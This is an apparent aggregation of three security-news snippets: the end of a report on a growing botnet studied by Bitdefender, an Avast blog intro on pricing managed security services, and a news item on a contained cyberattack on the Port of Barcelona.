The attacks also lead to the conclusion that the criminal group behind the botnet is continually updating its features. The greatly increased number of infected devices shows that the botnet is gaining momentum. Botnets are known to be very effective at launching distributed denial-of-service (DDoS) attacks, which can render websites and computer systems unusable.

Alex Balan, Chief Security Researcher at Bitdefender, said that for the time being the botnet’s purpose appears to be to grow in size and nothing more.
Although it supports commands for data exfiltration and code execution, the researchers have not seen the botnet use them, and there is no module for launching distributed denial-of-service attacks, a basic technique for monetizing a botnet.




Blog | Avast EN: The MSP Guide to Building Your Managed Security Services: Pricing Strategies | Avast Business

If you are thinking of reshaping your business into an MSP (managed service provider) that offers managed security services to SMB clients, your timing could not be better. Small to medium-sized businesses are in dire need of cybersecurity, and they are looking for MSPs that understand their unique needs and can offer the protection they require. In our first post on building managed security services, we discussed the proper defining and bundling of typical MSP-offered services. In this part, we explore key pricing strategies for managed security.



Blog | Avast EN

E Hacking News – Latest Hacker News and IT Security News: Latest Cyber-Crime Prey: The Port of Barcelona


Cyber-criminals attacked the Port of Barcelona on Thursday morning disrupting a few of its servers and systems.


The attack shook the organization only superficially: thanks to a contingency plan designed specifically for such situations, it could not do much damage.

The organization took to Twitter to inform the public about the occurrence of the incident. Not much regarding the attack is out in the open except for what the tweets say. Several of the servers of the organization were affected to a certain level. The Department of Information Systems is hot on the trail and is checking out the severity of the attack and looking out for solutions to mitigate the effects.

A couple of days before the attack, the organization had tweeted about how exposed everyone is to cyber-attacks and how they put the activities and security of stakeholders at risk.

The tweet included an article about the major cyber-security challenges faced by ports. Vulnerabilities must be removed before criminals sniff them out, and protocols must be crafted to prepare for unforeseen cyber-attacks.

The attack was pretty well handled by the Port Authority and later it was informed that the maritime operations were working as per usual and within regular parameters. Reception and delivery operations which were thought to be delayed also proceeded without interruption.

The organization has decided to say no more about the subject, so any further assumptions about the scenario would not be judicious.

